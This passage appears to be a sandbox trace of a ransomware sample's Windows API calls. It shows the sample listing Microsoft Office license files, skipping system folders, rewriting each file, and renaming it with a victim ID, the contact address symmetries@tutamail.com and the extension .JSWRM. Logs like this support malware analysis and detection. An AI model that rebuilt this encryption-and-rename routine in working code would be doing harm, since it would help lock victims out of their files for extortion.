lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0104.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0104.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0104.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0104.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.754] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0104.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0104.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.755] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe595804a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe595804a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5a631e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ad, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription3-ppd.xrm-ms", cAlternateFileName="O32FFC~1.XRM")) returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2=".") returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="..") returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="...") returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="windows") returned -1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.755] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0104.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0104.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.756] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26541) returned 1 [0104.756] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0104.756] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0104.759] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.759] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0104.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.760] CloseHandle (hObject=0x45c) returned 1 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0104.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0104.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0104.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0104.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0104.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0104.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.761] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe589944e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe589944e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe597e395, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription3-ul-oob.xrm-ms", cAlternateFileName="O3C0D2~1.XRM")) returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.761] lstrcmpiW (lpString1="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0104.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0104.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0104.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0104.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0104.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0104.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0104.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.762] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0104.762] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0104.762] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0104.764] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.764] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0104.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.765] CloseHandle (hObject=0x45c) returned 1 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0104.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0104.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0104.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0104.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0104.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0104.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe597e395, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe597e395, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5a893f7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription4-pl.xrm-ms", cAlternateFileName="O35B45~1.XRM")) returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2=".") returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="..") returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="...") returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="windows") returned -1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="recovery") returned -1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.766] lstrcmpiW (lpString1="O365HomePremR_Subscription4-pl.xrm-ms", lpString2="msocache") returned 1 [0104.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0104.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.768] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0104.768] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.768] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.770] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.770] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, 